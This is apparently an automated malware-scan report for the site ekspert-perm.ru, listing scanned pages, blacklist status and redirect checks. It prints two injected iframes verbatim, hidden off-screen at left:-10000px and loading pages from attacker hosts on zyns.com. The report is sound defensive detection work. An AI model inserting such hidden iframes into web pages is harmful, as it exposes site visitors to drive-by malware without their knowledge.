New scan:

Malware Scanner report for ekspert-perm.ru

Malicious/Suspicious/Total urls checked
1/0/17
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "ekspert-perm.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
2/0/2
2 malicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ekspert-perm.ru

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://ekspert-perm.ru/
200 OK
Content-Length: 249566
Content-Type: text/html
malicious
Page code contains blacklisted domain: staatis.zyns.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head>
<script type="text/javascript" src="/bitrix/templates/alfa-service/jquery/jquery-1.4.2.min.js"></script>
<script type="text/javascript" src="/bitrix/templates/alfa-service/jquery/fancybox/jquery.mousewheel-3.0
...[4411 bytes skipped]...

Malicious iFrame found.
size: 468x60     
src: http://starsic.zyns.com/out.php?sid=3
This URL is marked by Google as suspicious

<iframe src="http://starsic.zyns.com/out.php?sid=3" width="468" height="60" style="position:absolute;left:-10000px;">

Malicious iFrame found.
size: 468x60     
src: http://staatis.zyns.com/out.php?sid=3
This URL is marked by Google as suspicious

<iframe src="http://staatis.zyns.com/out.php?sid=3" width="468" height="60" style="position:absolute;left:-10000px;">

http://ekspert-perm.ru/bitrix/templates/alfa-service/jquery/jquery-1.4.2.min.js
200 OK
Content-Length: 72174
Content-Type: application/javascript
clean
http://ekspert-perm.ru/bitrix/templates/alfa-service/jquery/fancybox/jquery.mousewheel-3.0.2.pack.js
200 OK
Content-Length: 1157
Content-Type: application/javascript
clean
http://ekspert-perm.ru/bitrix/templates/alfa-service/jquery/fancybox/jquery.fancybox-1.3.1.pack.js
200 OK
Content-Length: 14731
Content-Type: application/javascript
clean
http://ekspert-perm.ru/bitrix/templates/alfa-service/script.js
200 OK
Content-Length: 4457
Content-Type: application/javascript
clean
http://ekspert-perm.ru/bitrix/js/main/core/core.js?1362634548
200 OK
Content-Length: 74101
Content-Type: application/javascript
clean
http://ekspert-perm.ru/bitrix/js/main/core/core_ajax.js?1362634548
200 OK
Content-Length: 28018
Content-Type: application/javascript
clean
http://ekspert-perm.ru/bitrix/js/main/session.js?1362488736
200 OK
Content-Length: 3157
Content-Type: application/javascript
clean
http://ekspert-perm.ru/contacts/
200 OK
Content-Length: 258975
Content-Type: text/html
clean
http://api-maps.yandex.ru/2.0-stable/?lang=ru-RU&coordorder=longlat&load=package.full&wizard=constructor&onload=fid_136315404690568462795
200 OK
Content-Length: 70757
Content-Type: text/javascript
clean
http://ekspert-perm.ru/about
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 26 Jan 2015 23:06:50 GMT
Location: http://ekspert-perm.ru/about/
Server: nginx/1.2.1
Content-Length: 345
Content-Type: text/html; charset=iso-8859-1
clean
http://ekspert-perm.ru/about/
200 OK
Content-Length: 257654
Content-Type: text/html
clean
http://ekspert-perm.ru/body/
200 OK
Content-Length: 287237
Content-Type: text/html
clean
http://ekspert-perm.ru/test-centr/
200 OK
Content-Length: 251752
Content-Type: text/html
clean
http://ekspert-perm.ru/photo-gallery
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 26 Jan 2015 23:06:56 GMT
Location: http://ekspert-perm.ru/photo-gallery/
Server: nginx/1.2.1
Content-Length: 353
Content-Type: text/html; charset=iso-8859-1
clean
http://ekspert-perm.ru/photo-gallery/
200 OK
Content-Length: 251844
Content-Type: text/html
clean
http://ekspert-perm.ru/services-menu/
200 OK
Content-Length: 242536
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: ekspert-perm.ru

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 26 Jan 2015 23:06:43 GMT
Pragma: no-cache
Server: nginx/1.2.1
Content-Type: text/html; charset=windows-1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
Set-Cookie: PHPSESSID=lljc200n9moo6dgsiej6dh0jt7; path=/
X-Powered-By: PHP/5.3.9
X-Powered-CMS: Bitrix Site Manager (a9322a4f68ac18f6e1d69de7f576f6af)
Second query (visit from search engine):
GET / HTTP/1.1
Host: ekspert-perm.ru
Referer: http://www.google.com/search?q=ekspert-perm.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.